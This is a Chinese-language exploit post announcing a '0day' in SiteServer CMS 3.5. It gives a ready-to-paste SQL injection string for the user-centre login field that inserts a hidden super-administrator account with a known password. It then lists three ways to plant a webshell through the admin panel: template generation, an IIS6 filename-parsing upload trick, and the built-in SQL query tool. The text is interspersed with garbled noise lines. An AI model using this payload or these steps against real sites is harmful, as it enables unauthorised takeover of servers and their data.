SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
' e. k; H+ b5 c
stieserver官网:www.siteserver.cn



EXP:

直接访问UserCenter/login.aspx

2 z4 U6 s, ]) Y5 I6 o( q4 L
  P7 U( u" L8 P2 n  r) I
, `4 C) g7 T  V. Q8 A用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


7 e9 g0 L8 I# n# e9 ?# a0 p7 T3 s3 L
& k9 t' P$ r$ ~; F0 d) E密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
; U: y: ~) ~9 g( i  C/ h
- G4 S2 f! S4 z8 V: x

6 p, A. Q! L. P* w! B之后再访问后台SiteServer/login.aspx用插入的用户登陆
2 l" p9 N" t/ T( d9 m$ k6 J
9 l! d7 Y3 _% e; ^- {) N
0 Z4 T! d5 S* z3 u/ H
9 w: Q" H. q+ U  n% {' u! D+ Q后台拿webshell的三种方法：
" o" e  N" C$ j: L
4 d0 ~& n  D: S2 Z" O* A5 n一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
' ^8 @# @4 G, d1 u+ J7 R& k
# {8 O. c: o0 G6 E/ E5 m' Q二、

成员权限-》添加用户-》用户名为：1.asp
! x7 f" H6 {  E' [9 U
2 D2 K2 y2 t& l$ n$ w6 _1 jhttp://127.0.0.1/usercenter/

/ G: M6 S0 c" F# b, J% R, s用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
, M: g( P3 U" \: ]" D: j
（ps：后台添加用户时不会验证是否含有非法字符）

三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

( a' }. b$ V) Z  b9 u4 A7 s6 v: v4 g系统工具-》数据库工具-》SQL语句查询
5 Q! O3 i' U) s. P这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
# m1 F- B' w( [1 h7 F1 x4 B* ?
9 D8 p( o$ e* [* j' D5 X7 K# i